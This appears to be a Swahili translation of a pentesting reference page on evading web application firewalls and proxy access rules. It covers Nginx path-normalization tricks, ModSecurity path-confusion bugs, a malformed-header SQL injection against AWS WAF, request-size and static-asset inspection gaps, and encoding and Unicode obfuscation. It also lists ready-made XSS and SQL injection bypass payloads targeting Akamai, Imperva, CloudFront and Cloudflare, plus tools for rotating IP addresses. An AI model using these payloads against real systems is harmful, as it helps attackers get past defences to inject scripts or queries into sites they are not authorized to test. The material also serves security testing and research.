Kuvuka Ulinzi wa Proxy / WAF

Reading time: 12 minutes

Kuvuka Nginx ACL Rules kwa Pathname Manipulation

Mbinu kutoka kwenye utafiti huu.

Mfano wa sheria ya Nginx:

location = /admin {
deny all;
}

location = /admin/ {
deny all;
}

Ili kuzuia bypasses, Nginx hufanya path normalization kabla ya kuikagua. Hata hivyo, ikiwa backend server inafanya normalization tofauti (kuondoa characters ambazo nginx haiondoi) inaweza kuwa inawezekana kupitisha defense hii.

NodeJS - Express

Flask

Spring Boot

PHP-FPM

Usanidi wa Nginx FPM:

location = /admin.php {
deny all;
}

location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

Nginx imewekwa kuzuia ufikiaji wa /admin.php lakini inawezekana ku-bypass kwa kufikia /admin.php/index.php.

Jinsi ya kuzuia

location ~* ^/admin {
deny all;
}

Kuepuka Mod Security Rules

Mchanganyiko wa path

In this post inaeleza kwamba ModSecurity v3 (hadi 3.0.12), iliweka vibaya variable REQUEST_FILENAME ambayo ilipaswa kuwa na path iliyofikiwa (mpaka mwanzo wa vigezo). Hii ni kwa sababu ilifanya URL decode ili kupata path.
Kwa hivyo, ombi kama http://example.com/foo%3f';alert(1);foo= katika ModSecurity litadhani kuwa path ni tu /foo kwa sababu %3f hubadilika kuwa ? ambayo inamaliza URL path, lakini kwa kweli path ambayo server itapokea itakuwa /foo%3f';alert(1);foo=.

Variables REQUEST_BASENAME na PATH_INFO pia ziliathirika na hitilafu hii.

Jambo linalofanana lilitokea katika toleo la 2 la Mod Security ambalo liliwezesha kuepuka kinga iliyokuwa ikizuia mtumiaji kufikia faili zenye extensions maalum zinazohusiana na backup (kama .bak) kwa kutuma dot iliyokuwa URL encoded kama %2e, kwa mfano: https://example.com/backup%2ebak.

Kuepuka AWS WAF ACL

Header isiyo sahihi

This research inataja kuwa ilikuwa inawezekana kuepuka rules za AWS WAF zilizotumika juu ya HTTP headers kwa kutuma header "malformed" ambayo haikufasiriwa ipasavyo na AWS lakini ilifasiriwa na backend server.

Kwa mfano, kutuma ombi lifuatalo lenye SQL injection katika header X-Query:

GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

Ilikuwa inawezekana kufanya bypass ya AWS WAF kwa sababu haikuweza kuelewa kwamba mstari uliofuata ni sehemu ya thamani ya header, wakati server ya NODEJS ilielewa (hili limeshughulikiwa).

Za Kawaida WAF bypasses

Mikomo ya Ukubwa wa Maombi

Kawaida WAF zina kikomo fulani cha urefu wa requests kukagua na ikiwa POST/PUT/PATCH request iko juu yake, WAF haitakagua request hiyo.

• For AWS WAF, you can check the documentation:

• From Azure docs:

Older Web Application Firewalls with Core Rule Set 3.1 (or lower) allow messages larger than 128 KB by turning off request body inspection, but these messages won't be checked for vulnerabilities. For newer versions (Core Rule Set 3.2 or newer), the same can be done by disabling the maximum request body limit. When a request exceeds the size limit:

If prevention mode: Logs and blocks the request.
If detection mode: Inspects up to the limit, ignores the rest, and logs if the Content-Length exceeds the limit.

• From Akamai:

By default, the WAF inspects only the first 8KB of a request. It can increase the limit up to 128KB by adding Advanced Metadata.

• From Cloudflare:

Up to 128KB.

Mapengo ya ukaguzi wa mali za static (.js GETs)

Baadhi ya CDN/WAF stacks hufanya uchunguzi dhaifu au bila uchunguzi kabisa kwa GET requests za static assets (kwa mfano path zinazomaliza kwa .js), wakati bado zikitumia rules za kimataifa kama rate limiting na IP reputation. Ikiambatana na auto-caching ya extensions za static, hili linaweza kutumika kuwasilisha au kuwekea variants zenye madhara ambazo huathiri response za HTML zinazofuata.

Matumizi ya vitendo:

• Tuma payloads katika headers zisizoaminika (kwa mfano, User-Agent) kwenye GET kwenda path ya .js ili kuepuka content inspection, kisha mara moja utafsiri HTML kuu ili kuathiri variant iliyocached.
• Tumia IP safi/mbadala; mara IP ikibandikwa, mabadiliko ya routing yanaweza kufanya mbinu isiwe ya kuaminika.
• Katika Burp Repeater, tumia "Send group in parallel" (single-packet style) kuendesha mbio za requests mbili (.js kisha HTML) kupitia front-end path ile ile.

Hii inafaa vizuri na header-reflection cache poisoning. Angalia:

Cache Poisoning and Cache Deception

• How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities

Obfuscation

# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;

Ulinganifu wa Unicode

Kutegemea utekelezaji wa Unicode normalization (maelezo zaidi here), herufi zinazoshiriki ulinganifu wa Unicode zinaweza kufanikiwa kupita WAF na kutekeleza kama payload iliyokusudiwa. Herufi zinazolingana zinaweza kupatikana here.

Mfano

# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
＜img src⁼p onerror⁼＇prompt⁽1⁾＇﹥  --> ＜img src=p onerror='prompt(1)'>

Kupitisha WAFs za Muktadha kwa kutumia kodishaji

As mentioned in this blog post, Ili kupitisha WAFs zinazoweza kuhifadhi muktadha wa ingizo la mtumiaji tunaweza kuutumia WAF techniques ili kwa hakika ku-normalize ingizo la mtumiaji.

Kwa mfano, kwenye chapisho imetajwa kwamba Akamai URL decoded a user input 10 times. Kwa hivyo kitu kama <input/%2525252525252525253e/onfocus kitaonekana na Akamai kama <input/>/onfocus ambayo inaweza kudhani kwamba iko sawa kwa sababu tag imefungwa. Hata hivyo, mradi tu application haifanyi URL decode ingizo mara 10, victim ataona kitu kama <input/%25252525252525253e/onfocus ambacho bado ni halali kwa XSS attack.

Hivyo, hii inaruhusu kuficha payloads katika vipengele vilivyokodishwa ambavyo WAF itavionyesha na kuyaelewa wakati victim hatayaona.

Zaidi ya hayo, hii inaweza kufanywa si tu na URL encoded payloads bali pia na encodings nyingine kama unicode, hex, octal...

Katika chapisho bypasses za mwisho zilizo pendekezwa ni:

• Akamai:akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>
• Imperva:imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">
• AWS/Cloudfront:docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>
• Cloudflare:cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">

Pia imetajwa kuwa kulingana na jinsi baadhi ya WAFs zinavyofahamu muktadha wa ingizo la mtumiaji, inaweza kuwa inawezekana kuudanganya. Mfano uliopendekezwa kwenye blog ni kwamba Akamai iliruhusu kuweka chochote kati ya /* na */ (labda kwa sababu hii hutumika kama comments). Kwa hivyo, SQLinjection kama /*'or sleep(5)-- -*/ haitakamatwa na itakuwa halali kwa kuwa /* ni string ya kuanza ya injection na */ ni commented.

Aina hizi za matatizo ya muktadha pia zinaweza kutumika kuabuse udhaifu mwingine tofauti na ule uliotarajiwa kujaribiwa na WAF (kwa mfano: hii pia inaweza kutumika kuchochea XSS).

H2C Smuggling

Upgrade Header Smuggling

IP Rotation

• https://github.com/ustayready/fireprox: Generate an API gateway URL to by used with ffuf
• https://github.com/rootcathacking/catspin: Similar to fireprox
• https://github.com/PortSwigger/ip-rotate: Burp Suite plugin that uses API gateway IPs
• https://github.com/fyoorer/ShadowClone: A dynamically determined number of container instances are activated based on the input file size and split factor, with the input split into chunks for parallel execution, such as 100 instances processing 100 chunks from a 10,000-line input file with a split factor of 100 lines.
• https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization

Regex Bypasses

Mbinu tofauti zinaweza kutumika kupitisha regex filters kwenye firewalls. Mifano ni pamoja na kutumia alternating case, kuongeza line breaks, na ku-encode payloads. Rasilimali za bypass mbalimbali zinaweza kupatikana kwenye PayloadsAllTheThings na OWASP. Mifano hapa chini ilichukuliwa kutoka this article.

<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)

Vifaa

• nowafpls: Burp plugin ya kuongeza junk data kwenye requests ili kupita WAFs kwa urefu

Marejeo

• https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies
• https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/
• https://www.youtube.com/watch?v=0OMmWtU2Y_g
• https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization
• How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities